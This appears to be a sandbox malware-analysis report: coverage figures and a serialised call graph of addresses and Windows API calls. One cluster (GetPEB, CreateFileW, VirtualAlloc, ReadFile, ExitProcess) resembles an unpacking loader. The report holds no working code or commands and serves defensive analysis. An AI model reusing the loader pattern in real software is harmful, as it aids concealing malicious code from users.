                                                                              Execution Coverage:3.1%
                                                                              Dynamic/Decrypted Code Coverage:2.4%
                                                                              Signature Coverage:3.4%
                                                                              Total number of Nodes:1599
                                                                              Total number of Limit Nodes:38
                                                                              [Interactive execution graph not reproduced: the serialised node/edge data behind the coverage figures above is not readable as text. API calls visible in the graph include HeapCreate, GetModuleHandleW, GetProcAddress, TlsAlloc, IsDebuggerPresent (with a MessageBoxA branch), GetCommandLineW, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, GetOpenFileNameW, Shell_NotifyIconW, GetForegroundWindow, ShellExecuteW, LoadLibraryA, WideCharToMultiByte and GetSystemTimeAsFileTime.]
42a349 83779->83778 83781 40f628 83779->83781 83782 415258 83779->83782 83781->83718 83783 415285 83782->83783 83784 415268 83782->83784 83783->83784 83786 41528c 83783->83786 83793 417f23 67 API calls __getptd_noexit 83784->83793 83795 41c551 103 API calls 14 library calls 83786->83795 83787 41526d 83794 417ebb 6 API calls 2 library calls 83787->83794 83790 4152b2 83791 41527d 83790->83791 83796 4191c9 101 API calls 6 library calls 83790->83796 83791->83779 83793->83787 83795->83790 83796->83791 83798 414d4c _fseek 83797->83798 83799 414d5f 83798->83799 83802 414d95 83798->83802 83849 417f23 67 API calls __getptd_noexit 83799->83849 83801 414d64 83850 417ebb 6 API calls 2 library calls 83801->83850 83816 41e28c 83802->83816 83805 414d74 _fseek @_EH4_CallFilterFunc@8 83805->83720 83806 414d9a 83807 414da1 83806->83807 83808 414dae 83806->83808 83851 417f23 67 API calls __getptd_noexit 83807->83851 83809 414dd6 83808->83809 83810 414db6 83808->83810 83834 41dfd8 83809->83834 83852 417f23 67 API calls __getptd_noexit 83810->83852 83817 41e298 _fseek 83816->83817 83818 418407 __lock 67 API calls 83817->83818 83820 41e2a6 83818->83820 83819 41e322 83822 416fb6 __malloc_crt 67 API calls 83819->83822 83820->83819 83826 418344 __mtinitlocknum 67 API calls 83820->83826 83829 41e31b 83820->83829 83857 4159a6 68 API calls __lock 83820->83857 83858 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 83820->83858 83824 41e32c 83822->83824 83823 41e3b0 _fseek 83823->83806 83824->83829 83859 4189e6 InitializeCriticalSectionAndSpinCount _fseek 83824->83859 83826->83820 83828 41e351 83830 41e35c 83828->83830 83831 41e36f EnterCriticalSection 83828->83831 83854 41e3bb 83829->83854 83833 413a88 __getptd_noexit 67 API calls 83830->83833 83831->83829 83833->83829 83835 41dffb __wopenfile 83834->83835 83836 41e015 83835->83836 83848 41e1e9 83835->83848 83866 4136bc 79 API calls 2 library calls 83835->83866 83864 417f23 67 API calls __getptd_noexit 83836->83864 83838 41e01a 83865 
417ebb 6 API calls 2 library calls 83838->83865 83840 41e247 83861 425db0 83840->83861 83844 41e1e2 83844->83848 83867 4136bc 79 API calls 2 library calls 83844->83867 83846 41e201 83846->83848 83868 4136bc 79 API calls 2 library calls 83846->83868 83848->83836 83848->83840 83849->83801 83851->83805 83852->83805 83853 414dfc LeaveCriticalSection LeaveCriticalSection __wfsopen 83853->83805 83860 41832d LeaveCriticalSection 83854->83860 83856 41e3c2 83856->83823 83857->83820 83858->83820 83859->83828 83860->83856 83869 425ce4 83861->83869 83863 414de1 83863->83853 83864->83838 83866->83844 83867->83846 83868->83848 83870 425cf0 _fseek 83869->83870 83871 425d03 83870->83871 83874 425d41 83870->83874 83872 417f23 _memcpy_s 67 API calls 83871->83872 83873 425d08 83872->83873 83875 417ebb _memcpy_s 6 API calls 83873->83875 83876 4255c4 __tsopen_nolock 132 API calls 83874->83876 83879 425d17 _fseek 83875->83879 83877 425d5b 83876->83877 83878 425d82 __sopen_helper LeaveCriticalSection 83877->83878 83878->83879 83879->83863 83884 415588 _fseek 83880->83884 83881 415596 83911 417f23 67 API calls __getptd_noexit 83881->83911 83883 4155c4 83893 415965 83883->83893 83884->83881 83884->83883 83885 41559b 83912 417ebb 6 API calls 2 library calls 83885->83912 83892 4155ab _fseek 83892->83725 83894 415977 83893->83894 83895 415999 EnterCriticalSection 83893->83895 83894->83895 83896 41597f 83894->83896 83898 4155cc 83895->83898 83897 418407 __lock 67 API calls 83896->83897 83897->83898 83899 4154f2 83898->83899 83900 415512 83899->83900 83901 415502 83899->83901 83902 415524 83900->83902 83914 4152e7 83900->83914 83968 417f23 67 API calls __getptd_noexit 83901->83968 83931 41486c 83902->83931 83904 415507 83913 4155f7 LeaveCriticalSection LeaveCriticalSection __wfsopen 83904->83913 83911->83885 83913->83892 83915 41531a 83914->83915 83916 4152fa 83914->83916 83918 41453a __fileno 67 API calls 83915->83918 83969 417f23 67 API calls __getptd_noexit 83916->83969 83920 415320 
83918->83920 83919 4152ff 83970 417ebb 6 API calls 2 library calls 83919->83970 83922 41efd4 __locking 71 API calls 83920->83922 83923 415335 83922->83923 83924 415364 83923->83924 83925 4153a9 83923->83925 83930 41530f 83923->83930 83927 41efd4 __locking 71 API calls 83924->83927 83924->83930 83971 417f23 67 API calls __getptd_noexit 83925->83971 83928 415404 83927->83928 83929 41efd4 __locking 71 API calls 83928->83929 83928->83930 83929->83930 83930->83902 83932 4148a7 83931->83932 83933 414885 83931->83933 83937 41453a 83932->83937 83933->83932 83934 41453a __fileno 67 API calls 83933->83934 83935 4148a0 83934->83935 83972 41c3cf 101 API calls 6 library calls 83935->83972 83938 41455e 83937->83938 83939 414549 83937->83939 83943 41efd4 83938->83943 83973 417f23 67 API calls __getptd_noexit 83939->83973 83941 41454e 83974 417ebb 6 API calls 2 library calls 83941->83974 83944 41efe0 _fseek 83943->83944 83945 41f003 83944->83945 83946 41efe8 83944->83946 83948 41f011 83945->83948 83951 41f052 83945->83951 83995 417f36 67 API calls __getptd_noexit 83946->83995 83997 417f36 67 API calls __getptd_noexit 83948->83997 83949 41efed 83996 417f23 67 API calls __getptd_noexit 83949->83996 83975 41ba3b 83951->83975 83953 41f016 83998 417f23 67 API calls __getptd_noexit 83953->83998 83956 41f01d 83999 417ebb 6 API calls 2 library calls 83956->83999 83957 41f058 83959 41f065 83957->83959 83960 41f07b 83957->83960 83985 41ef5f 83959->83985 84000 417f23 67 API calls __getptd_noexit 83960->84000 83961 41eff5 _fseek 83961->83904 83964 41f073 84002 41f0a6 LeaveCriticalSection __unlock_fhandle 83964->84002 83965 41f080 84001 417f36 67 API calls __getptd_noexit 83965->84001 83968->83904 83969->83919 83971->83930 83972->83932 83973->83941 83976 41ba47 _fseek 83975->83976 83977 41baa2 83976->83977 83980 418407 __lock 67 API calls 83976->83980 83978 41bac4 _fseek 83977->83978 83979 41baa7 EnterCriticalSection 83977->83979 83978->83957 83979->83978 83981 41ba73 83980->83981 83982 4189e6 
___lock_fhandle InitializeCriticalSectionAndSpinCount 83981->83982 83984 41ba8a 83981->83984 83982->83984 83983 41bad2 ___lock_fhandle LeaveCriticalSection 83983->83977 83984->83983 83986 41b9c4 __close_nolock 67 API calls 83985->83986 83987 41ef6e 83986->83987 83988 41ef84 SetFilePointer 83987->83988 83989 41ef74 83987->83989 83991 41ef9b GetLastError 83988->83991 83992 41efa3 83988->83992 83990 417f23 _memcpy_s 67 API calls 83989->83990 83993 41ef79 83990->83993 83991->83992 83992->83993 83994 417f49 __dosmaperr 67 API calls 83992->83994 83993->83964 83994->83993 83995->83949 83996->83961 83997->83953 83998->83956 84000->83965 84001->83964 84002->83961 84004 414e31 84003->84004 84005 414e4d 84003->84005 84049 417f23 67 API calls __getptd_noexit 84004->84049 84007 414e46 84005->84007 84009 41486c __flush 101 API calls 84005->84009 84021 414f08 LeaveCriticalSection LeaveCriticalSection __wfsopen 84007->84021 84008 414e36 84050 417ebb 6 API calls 2 library calls 84008->84050 84011 414e59 84009->84011 84022 41e680 84011->84022 84014 41453a __fileno 67 API calls 84015 414e67 84014->84015 84026 41e5b3 84015->84026 84017 414e6d 84017->84007 84018 413a88 __getptd_noexit 67 API calls 84017->84018 84018->84007 84019->83735 84021->83740 84023 41e690 84022->84023 84024 414e61 84022->84024 84023->84024 84025 413a88 __getptd_noexit 67 API calls 84023->84025 84024->84014 84025->84024 84027 41e5bf _fseek 84026->84027 84028 41e5e2 84027->84028 84029 41e5c7 84027->84029 84031 41e5f0 84028->84031 84036 41e631 84028->84036 84066 417f36 67 API calls __getptd_noexit 84029->84066 84068 417f36 67 API calls __getptd_noexit 84031->84068 84032 41e5cc 84067 417f23 67 API calls __getptd_noexit 84032->84067 84035 41e5f5 84069 417f23 67 API calls __getptd_noexit 84035->84069 84037 41ba3b ___lock_fhandle 68 API calls 84036->84037 84039 41e637 84037->84039 84041 41e652 84039->84041 84042 41e644 84039->84042 84040 41e5fc 84070 417ebb 6 API calls 2 library calls 84040->84070 84071 417f23 67 API 
calls __getptd_noexit 84041->84071 84051 41e517 84042->84051 84046 41e5d4 _fseek 84046->84017 84047 41e64c 84072 41e676 LeaveCriticalSection __unlock_fhandle 84047->84072 84049->84008 84073 41b9c4 84051->84073 84053 41e57d 84086 41b93e 68 API calls 2 library calls 84053->84086 84055 41e527 84055->84053 84058 41b9c4 __close_nolock 67 API calls 84055->84058 84065 41e55b 84055->84065 84056 41b9c4 __close_nolock 67 API calls 84059 41e567 CloseHandle 84056->84059 84057 41e585 84060 41e5a7 84057->84060 84087 417f49 67 API calls 3 library calls 84057->84087 84061 41e552 84058->84061 84059->84053 84063 41e573 GetLastError 84059->84063 84060->84047 84062 41b9c4 __close_nolock 67 API calls 84061->84062 84062->84065 84063->84053 84065->84053 84065->84056 84066->84032 84067->84046 84068->84035 84069->84040 84071->84047 84072->84046 84074 41b9d1 84073->84074 84075 41b9e9 84073->84075 84076 417f36 __free_osfhnd 67 API calls 84074->84076 84078 417f36 __free_osfhnd 67 API calls 84075->84078 84080 41ba2e 84075->84080 84077 41b9d6 84076->84077 84079 417f23 _memcpy_s 67 API calls 84077->84079 84081 41ba17 84078->84081 84082 41b9de 84079->84082 84080->84055 84083 417f23 _memcpy_s 67 API calls 84081->84083 84082->84055 84084 41ba1e 84083->84084 84085 417ebb _memcpy_s 6 API calls 84084->84085 84085->84080 84086->84057 84087->84060 84089 415126 _fseek 84088->84089 84090 41513a _memset 84089->84090 84091 41516f 84089->84091 84092 415164 _fseek 84089->84092 84117 417f23 67 API calls __getptd_noexit 84090->84117 84093 415965 __lock_file 68 API calls 84091->84093 84092->83745 84094 415177 84093->84094 84101 414f10 84094->84101 84097 415154 84118 417ebb 6 API calls 2 library calls 84097->84118 84102 414f4c 84101->84102 84105 414f2e _memset 84101->84105 84119 4151a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 84102->84119 84103 414f37 84170 417f23 67 API calls __getptd_noexit 84103->84170 84105->84102 84105->84103 84108 414f8b 84105->84108 84108->84102 84109 41453a __fileno 67 API 
calls 84108->84109 84113 4150a9 _memset 84108->84113 84116 4150d5 _memset 84108->84116 84120 41ed9e 84108->84120 84150 41e6b1 84108->84150 84172 41ee9b 67 API calls 2 library calls 84108->84172 84109->84108 84173 417f23 67 API calls __getptd_noexit 84113->84173 84115 414f3c 84171 417ebb 6 API calls 2 library calls 84115->84171 84174 417f23 67 API calls __getptd_noexit 84116->84174 84117->84097 84119->84092 84121 41edaa _fseek 84120->84121 84122 41edb2 84121->84122 84123 41edcd 84121->84123 84244 417f36 67 API calls __getptd_noexit 84122->84244 84124 41eddb 84123->84124 84130 41ee1c 84123->84130 84246 417f36 67 API calls __getptd_noexit 84124->84246 84126 41edb7 84245 417f23 67 API calls __getptd_noexit 84126->84245 84129 41ede0 84247 417f23 67 API calls __getptd_noexit 84129->84247 84131 41ee29 84130->84131 84132 41ee3d 84130->84132 84249 417f36 67 API calls __getptd_noexit 84131->84249 84135 41ba3b ___lock_fhandle 68 API calls 84132->84135 84138 41ee43 84135->84138 84136 41ede7 84248 417ebb 6 API calls 2 library calls 84136->84248 84137 41ee2e 84250 417f23 67 API calls __getptd_noexit 84137->84250 84141 41ee50 84138->84141 84142 41ee66 84138->84142 84140 41edbf _fseek 84140->84108 84175 41e7dc 84141->84175 84251 417f23 67 API calls __getptd_noexit 84142->84251 84146 41ee5e 84253 41ee91 LeaveCriticalSection __unlock_fhandle 84146->84253 84147 41ee6b 84252 417f36 67 API calls __getptd_noexit 84147->84252 84151 41e6c1 84150->84151 84155 41e6de 84150->84155 84257 417f23 67 API calls __getptd_noexit 84151->84257 84153 41e6c6 84258 417ebb 6 API calls 2 library calls 84153->84258 84156 41e713 84155->84156 84164 41e6d6 84155->84164 84254 423600 84155->84254 84158 41453a __fileno 67 API calls 84156->84158 84159 41e727 84158->84159 84160 41ed9e __read 79 API calls 84159->84160 84161 41e72e 84160->84161 84162 41453a __fileno 67 API calls 84161->84162 84161->84164 84163 41e751 84162->84163 84163->84164 84165 41453a __fileno 67 API calls 84163->84165 84164->84108 84166 41e75d 
84165->84166 84166->84164 84167 41453a __fileno 67 API calls 84166->84167 84168 41e769 84167->84168 84169 41453a __fileno 67 API calls 84168->84169 84169->84164 84170->84115 84172->84108 84173->84115 84174->84115 84176 41e813 84175->84176 84177 41e7f8 84175->84177 84179 41e822 84176->84179 84181 41e849 84176->84181 84178 417f36 __free_osfhnd 67 API calls 84177->84178 84180 41e7fd 84178->84180 84182 417f36 __free_osfhnd 67 API calls 84179->84182 84184 417f23 _memcpy_s 67 API calls 84180->84184 84183 41e868 84181->84183 84198 41e87c 84181->84198 84185 41e827 84182->84185 84186 417f36 __free_osfhnd 67 API calls 84183->84186 84195 41e805 84184->84195 84188 417f23 _memcpy_s 67 API calls 84185->84188 84190 41e86d 84186->84190 84187 41e8d4 84189 417f36 __free_osfhnd 67 API calls 84187->84189 84191 41e82e 84188->84191 84192 41e8d9 84189->84192 84193 417f23 _memcpy_s 67 API calls 84190->84193 84194 417ebb _memcpy_s 6 API calls 84191->84194 84196 417f23 _memcpy_s 67 API calls 84192->84196 84197 41e874 84193->84197 84194->84195 84195->84146 84196->84197 84201 417ebb _memcpy_s 6 API calls 84197->84201 84198->84187 84198->84195 84199 41e8b0 84198->84199 84200 41e8f5 84198->84200 84199->84187 84206 41e8bb ReadFile 84199->84206 84203 416fb6 __malloc_crt 67 API calls 84200->84203 84201->84195 84207 41e90b 84203->84207 84204 41ed62 GetLastError 84208 41ebe8 84204->84208 84209 41ed6f 84204->84209 84205 41e9e7 84205->84204 84212 41e9fb 84205->84212 84206->84204 84206->84205 84210 41e931 84207->84210 84211 41e913 84207->84211 84216 417f49 __dosmaperr 67 API calls 84208->84216 84223 41eb6d 84208->84223 84214 417f23 _memcpy_s 67 API calls 84209->84214 84213 423462 __lseeki64_nolock 69 API calls 84210->84213 84215 417f23 _memcpy_s 67 API calls 84211->84215 84212->84223 84225 41ec2d 84212->84225 84226 41ea17 84212->84226 84218 41e93d 84213->84218 84219 41ed74 84214->84219 84217 41e918 84215->84217 84216->84223 84220 417f36 __free_osfhnd 67 API calls 84217->84220 84218->84206 84221 417f36 
__free_osfhnd 67 API calls 84219->84221 84220->84195 84221->84223 84222 413a88 __getptd_noexit 67 API calls 84222->84195 84223->84195 84223->84222 84224 41eca5 ReadFile 84229 41ecc4 GetLastError 84224->84229 84237 41ecce 84224->84237 84225->84223 84225->84224 84227 41ea7d ReadFile 84226->84227 84232 41eafa 84226->84232 84228 41ea9b GetLastError 84227->84228 84236 41eaa5 84227->84236 84228->84226 84228->84236 84229->84225 84229->84237 84230 41ebbe MultiByteToWideChar 84230->84223 84231 41ebe2 GetLastError 84230->84231 84231->84208 84232->84223 84233 41eb75 84232->84233 84234 41eb68 84232->84234 84239 41eb32 84232->84239 84233->84239 84240 41ebac 84233->84240 84235 417f23 _memcpy_s 67 API calls 84234->84235 84235->84223 84236->84226 84241 423462 __lseeki64_nolock 69 API calls 84236->84241 84237->84225 84238 423462 __lseeki64_nolock 69 API calls 84237->84238 84238->84237 84239->84230 84242 423462 __lseeki64_nolock 69 API calls 84240->84242 84241->84236 84243 41ebbb 84242->84243 84243->84230 84244->84126 84245->84140 84246->84129 84247->84136 84249->84137 84250->84136 84251->84147 84252->84146 84253->84140 84255 416fb6 __malloc_crt 67 API calls 84254->84255 84256 423615 84255->84256 84256->84156 84257->84153 84262 414cef GetSystemTimeAsFileTime __aulldiv 84259->84262 84261 4431ef 84261->83748 84262->84261 84263->83756 84265->83761 84271 4523e1 _wcscpy 84266->84271 84267 44afdc GetSystemTimeAsFileTime 84267->84271 84268 4151b0 81 API calls __fread_nolock 84268->84271 84269 452553 84269->83670 84269->83671 84270 41557c 105 API calls _fseek 84270->84271 84271->84267 84271->84268 84271->84269 84271->84270 84273 44b1a6 84272->84273 84275 44b1b4 84272->84275 84274 414e06 138 API calls 84273->84274 84274->84275 84276 44b1ca 84275->84276 84277 414e06 138 API calls 84275->84277 84278 44b1c2 84275->84278 84307 4352d1 81 API calls 2 library calls 84276->84307 84280 44b2c1 84277->84280 84278->83698 84280->84276 84282 44b2cf 84280->84282 84281 44b20d 84283 44b211 84281->84283 84284 
44b23b 84281->84284 84285 44b2dc 84282->84285 84287 414e94 __fcloseall 106 API calls 84282->84287 84286 44b21e 84283->84286 84289 414e94 __fcloseall 106 API calls 84283->84289 84308 43526e 84284->84308 84285->83698 84290 44b22e 84286->84290 84292 414e94 __fcloseall 106 API calls 84286->84292 84287->84285 84289->84286 84290->83698 84291 44b242 84293 44b270 84291->84293 84294 44b248 84291->84294 84292->84290 84318 44b0af 111 API calls 84293->84318 84296 44b255 84294->84296 84297 414e94 __fcloseall 106 API calls 84294->84297 84298 44b265 84296->84298 84300 414e94 __fcloseall 106 API calls 84296->84300 84297->84296 84298->83698 84299 44b276 84319 43522c 67 API calls __getptd_noexit 84299->84319 84300->84298 84302 44b27c 84303 44b289 84302->84303 84305 414e94 __fcloseall 106 API calls 84302->84305 84304 44b299 84303->84304 84306 414e94 __fcloseall 106 API calls 84303->84306 84304->83698 84305->84303 84306->84304 84307->84281 84309 4138ba _malloc 67 API calls 84308->84309 84310 43527d 84309->84310 84311 4138ba _malloc 67 API calls 84310->84311 84312 43528d 84311->84312 84313 4138ba _malloc 67 API calls 84312->84313 84315 43529d 84313->84315 84316 4352bc 84315->84316 84320 43522c 67 API calls __getptd_noexit 84315->84320 84316->84291 84317 4352c8 84317->84291 84318->84299 84319->84302 84320->84317 84321->83578 84323 410148 SHGetDesktopFolder 84322->84323 84326 4101a3 _wcscpy 84322->84326 84324 41015a _wcscpy 84323->84324 84323->84326 84325 41018a SHGetPathFromIDListW 84324->84325 84324->84326 84325->84326 84326->83582 84327->83584 84329 40f5e0 152 API calls 84328->84329 84330 40f417 84329->84330 84331 42ca37 84330->84331 84332 40f42c 84330->84332 84333 42ca1f 84330->84333 84334 452574 140 API calls 84331->84334 84369 4037e0 139 API calls 7 library calls 84332->84369 84370 43717f 110 API calls _printf 84333->84370 84337 42ca50 84334->84337 84340 42ca76 84337->84340 84341 42ca54 84337->84341 84338 40f446 84338->83581 84339 42ca2d 84339->84331 84343 41171a 75 API calls 
84340->84343 84342 434fe1 106 API calls 84341->84342 84344 42ca5e 84342->84344 84346 42cacc ctype 84343->84346 84371 43717f 110 API calls _printf 84344->84371 84348 42ccc3 84346->84348 84356 401b70 75 API calls 84346->84356 84359 445051 84346->84359 84362 402cc0 75 API calls 2 library calls 84346->84362 84363 4026a0 84346->84363 84372 44c80c 87 API calls 3 library calls 84346->84372 84373 44b408 75 API calls 84346->84373 84347 42ca6c 84347->84340 84349 413a88 __getptd_noexit 67 API calls 84348->84349 84350 42cccd 84349->84350 84351 434fe1 106 API calls 84350->84351 84352 42ccda 84351->84352 84356->84346 84360 41171a 75 API calls 84359->84360 84361 445080 _memcpy_s 84360->84361 84361->84346 84361->84361 84362->84346 84364 4026af 84363->84364 84365 40276b 84363->84365 84364->84365 84366 41171a 75 API calls 84364->84366 84367 4026ee ctype 84364->84367 84365->84346 84366->84367 84367->84365 84368 41171a 75 API calls 84367->84368 84368->84367 84369->84338 84370->84339 84371->84347 84372->84346 84373->84346 84374->83591 84375->83592 84376 3ecbfc8 84390 3ec9c18 84376->84390 84378 3ecc0a8 84393 3ecbeb8 84378->84393 84380 3ecc0d1 CreateFileW 84382 3ecc125 84380->84382 84384 3ecc120 84380->84384 84383 3ecc13c VirtualAlloc 84382->84383 84382->84384 84383->84384 84385 3ecc15a ReadFile 84383->84385 84385->84384 84386 3ecc175 84385->84386 84387 3ecaeb8 13 API calls 84386->84387 84388 3ecc1a8 84387->84388 84389 3ecc1cb ExitProcess 84388->84389 84389->84384 84396 3ecd0d8 GetPEB 84390->84396 84392 3eca2a3 84392->84378 84394 3ecbec1 Sleep 84393->84394 84395 3ecbecf 84394->84395 84397 3ecd102 84396->84397 84397->84392 84398 444343 84401 444326 84398->84401 84400 44434e WriteFile 84402 444340 84401->84402 84403 4442c7 84401->84403 84402->84400 84408 40e190 SetFilePointerEx 84403->84408 84405 4442e0 SetFilePointerEx 84409 40e190 SetFilePointerEx 84405->84409 84407 4442ff 84407->84400 84408->84405 84409->84407 84410 46d22f 84413 46d098 84410->84413 84412 46d241 84414 46d0b5 84413->84414 
84415 46d115 84414->84415 84416 46d0b9 84414->84416 84468 45c216 78 API calls 84415->84468 84417 41171a 75 API calls 84416->84417 84419 46d0c0 84417->84419 84421 46d0cc 84419->84421 84461 40d940 76 API calls 84419->84461 84420 46d126 84422 46d0f8 84420->84422 84429 46d142 84420->84429 84462 453063 84421->84462 84423 4092c0 VariantClear 84422->84423 84425 46d0fd 84423->84425 84425->84412 84430 46d1c8 84429->84430 84431 46d158 84429->84431 84474 4676a3 78 API calls 84430->84474 84434 453063 111 API calls 84431->84434 84432 46d0ea 84432->84429 84435 46d0ee 84432->84435 84442 46d15e 84434->84442 84435->84422 84467 44ade5 CloseHandle ctype 84435->84467 84436 46d1ce 84475 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84436->84475 84437 46d18d 84469 467fce 82 API calls 84437->84469 84439 46d196 84470 4013a0 75 API calls 84439->84470 84442->84437 84442->84439 84444 46d1e7 84447 4092c0 VariantClear 84444->84447 84455 46d194 84444->84455 84445 46d1a2 84471 40df50 75 API calls 84445->84471 84447->84455 84448 46d1ac 84472 40d3b0 75 API calls 2 library calls 84448->84472 84450 46d224 84450->84412 84451 46d1b8 84473 467fce 82 API calls 84451->84473 84454 46d216 84476 44ade5 CloseHandle ctype 84454->84476 84455->84450 84457 40d900 84455->84457 84458 40d917 84457->84458 84459 40d909 84457->84459 84458->84459 84460 40d91c CloseHandle 84458->84460 84459->84454 84460->84454 84461->84421 84463 45306e 84462->84463 84464 45307a 84462->84464 84463->84464 84477 452e2a 111 API calls 5 library calls 84463->84477 84466 40dfa0 83 API calls 84464->84466 84466->84432 84467->84422 84468->84420 84469->84455 84470->84445 84471->84448 84472->84451 84473->84455 84474->84436 84475->84444 84476->84450 84477->84464 84478 40116e 84479 401119 DefWindowProcW 84478->84479 84480 40f110 RegOpenKeyExW 84481 40f13c RegQueryValueExW RegCloseKey 84480->84481 84482 40f15f 84480->84482 84481->84482 84483 429212 84488 410b90 84483->84488 84486 411421 __cinit 74 API calls 84487 42922f 84486->84487 84489 410b9a 
__write_nolock 84488->84489 84490 41171a 75 API calls 84489->84490 84491 410c31 GetModuleFileNameW 84490->84491 84505 413db0 84491->84505 84493 410c66 _wcsncat 84508 413e3c 84493->84508 84496 41171a 75 API calls 84497 410ca3 _wcscpy 84496->84497 84498 410cd1 RegOpenKeyExW 84497->84498 84499 429bc3 RegQueryValueExW 84498->84499 84500 410cf7 84498->84500 84501 429cd9 RegCloseKey 84499->84501 84503 429bf2 _wcscat _wcslen _wcsncpy 84499->84503 84500->84486 84502 41171a 75 API calls 84502->84503 84503->84502 84504 429cd8 84503->84504 84504->84501 84511 413b95 84505->84511 84541 41abec 84508->84541 84518 413bae 84511->84518 84523 413c2f 84511->84523 84512 413d60 84537 417f23 67 API calls __getptd_noexit 84512->84537 84513 413d7b 84539 417f23 67 API calls __getptd_noexit 84513->84539 84516 413d65 84521 413cfb 84516->84521 84538 417ebb 6 API calls 2 library calls 84516->84538 84518->84523 84527 413c1d 84518->84527 84533 41ab19 67 API calls _memcpy_s 84518->84533 84520 413d03 84520->84521 84520->84523 84524 413d8e 84520->84524 84521->84493 84522 413cb9 84522->84523 84525 413cd6 84522->84525 84535 41ab19 67 API calls _memcpy_s 84522->84535 84523->84512 84523->84513 84540 41ab19 67 API calls _memcpy_s 84524->84540 84525->84521 84525->84523 84529 413cef 84525->84529 84527->84523 84532 413c9b 84527->84532 84534 41ab19 67 API calls _memcpy_s 84527->84534 84536 41ab19 67 API calls _memcpy_s 84529->84536 84532->84520 84532->84522 84533->84527 84534->84532 84535->84525 84536->84521 84537->84516 84539->84516 84540->84521 84542 41ac02 84541->84542 84543 41abfd 84541->84543 84550 417f23 67 API calls __getptd_noexit 84542->84550 84543->84542 84549 41ac22 84543->84549 84545 41ac07 84551 417ebb 6 API calls 2 library calls 84545->84551 84548 410c99 84548->84496 84549->84548 84552 417f23 67 API calls __getptd_noexit 84549->84552 84550->84545 84552->84545 84553 401230 84554 401241 _memset 84553->84554 84555 4012c5 84553->84555 84568 401be0 84554->84568 84557 40126b 84558 4012ae KillTimer 
SetTimer 84557->84558 84559 42aa61 84557->84559 84560 401298 84557->84560 84558->84555 84563 42aa8b Shell_NotifyIconW 84559->84563 84564 42aa69 Shell_NotifyIconW 84559->84564 84561 4012a2 84560->84561 84562 42aaac 84560->84562 84561->84558 84565 42aaf8 Shell_NotifyIconW 84561->84565 84566 42aad7 Shell_NotifyIconW 84562->84566 84567 42aab5 Shell_NotifyIconW 84562->84567 84563->84558 84564->84558 84565->84558 84566->84558 84567->84558 84569 401bfb 84568->84569 84589 401cde 84568->84589 84590 4013a0 75 API calls 84569->84590 84571 401c0b 84572 42a9a0 LoadStringW 84571->84572 84573 401c18 84571->84573 84575 42a9bb 84572->84575 84591 4021e0 84573->84591 84604 40df50 75 API calls 84575->84604 84576 401c2d 84578 401c3a 84576->84578 84579 42a9cd 84576->84579 84578->84575 84580 401c44 84578->84580 84605 40d3b0 75 API calls 2 library calls 84579->84605 84603 40d3b0 75 API calls 2 library calls 84580->84603 84583 42a9dc 84584 42a9f0 84583->84584 84586 401c53 _memset _wcscpy _wcsncpy 84583->84586 84606 40d3b0 75 API calls 2 library calls 84584->84606 84588 401cc2 Shell_NotifyIconW 84586->84588 84587 42a9fe 84588->84589 84589->84557 84590->84571 84592 42a598 84591->84592 84595 4021f1 _wcslen 84591->84595 84609 40c740 84592->84609 84594 42a5a2 84596 402205 84595->84596 84597 402226 84595->84597 84607 404020 75 API calls ctype 84596->84607 84608 401380 75 API calls 84597->84608 84600 40220c _memcpy_s 84600->84576 84601 40222d 84601->84594 84602 41171a 75 API calls 84601->84602 84602->84600 84603->84586 84604->84586 84605->84583 84606->84587 84607->84600 84608->84601 84610 40c752 84609->84610 84611 40c747 84609->84611 84610->84594 84611->84610 84614 402ae0 75 API calls _memcpy_s 84611->84614 84613 42a572 _memcpy_s 84613->84594 84614->84613 84615 4034b0 84616 4034b9 84615->84616 84617 4034bd 84615->84617 84618 41171a 75 API calls 84617->84618 84619 42a0ba 84617->84619 84620 4034fe _memcpy_s ctype 84618->84620 84621 431914 84622 431920 84621->84622 84623 431928 84622->84623 84624 
43193d 84622->84624 84885 45e62e 116 API calls 3 library calls 84623->84885 84886 47f2b4 174 API calls 84624->84886 84627 43194a 84664 4095b0 ctype 84627->84664 84887 45e62e 116 API calls 3 library calls 84627->84887 84629 409708 84630 4097af 84630->84629 84872 40d590 VariantClear 84630->84872 84633 4315b8 WaitForSingleObject 84635 4315d6 GetExitCodeProcess CloseHandle 84633->84635 84633->84664 84876 40d590 VariantClear 84635->84876 84636 431623 Sleep 84639 43163b timeGetTime 84636->84639 84657 409894 84636->84657 84639->84657 84642 40986e Sleep 84644 409880 timeGetTime 84642->84644 84642->84657 84643 4098f1 TranslateMessage DispatchMessageW 84643->84664 84644->84657 84645 431673 CloseHandle 84645->84657 84646 43170c GetExitCodeProcess CloseHandle 84646->84657 84647 40d590 VariantClear 84647->84657 84649 46dd22 133 API calls 84649->84657 84651 46e641 134 API calls 84651->84657 84652 431781 Sleep 84652->84664 84657->84645 84657->84646 84657->84647 84657->84649 84657->84651 84657->84652 84662 4092c0 VariantClear 84657->84662 84657->84664 84873 447e59 75 API calls 84657->84873 84874 453b07 77 API calls 84657->84874 84875 4646a2 76 API calls 84657->84875 84877 444233 88 API calls _wcslen 84657->84877 84878 457509 VariantClear 84657->84878 84879 404120 84657->84879 84883 4717e3 VariantClear 84657->84883 84884 436272 6 API calls 84657->84884 84661 4319c9 VariantClear 84661->84664 84662->84657 84663 4092c0 VariantClear 84663->84664 84664->84629 84664->84630 84664->84633 84664->84636 84664->84642 84664->84643 84664->84657 84664->84661 84664->84663 84665 45e62e 116 API calls 84664->84665 84667 40b380 84664->84667 84691 409340 84664->84691 84724 409030 84664->84724 84738 40d300 84664->84738 84743 40d320 84664->84743 84749 409a40 84664->84749 84888 40e380 VariantClear ctype 84664->84888 84665->84664 84668 40b3a5 84667->84668 84669 40b53d 84667->84669 84670 430a99 84668->84670 84676 40b3b6 84668->84676 84889 45e62e 116 API calls 3 library calls 84669->84889 84890 45e62e 116 
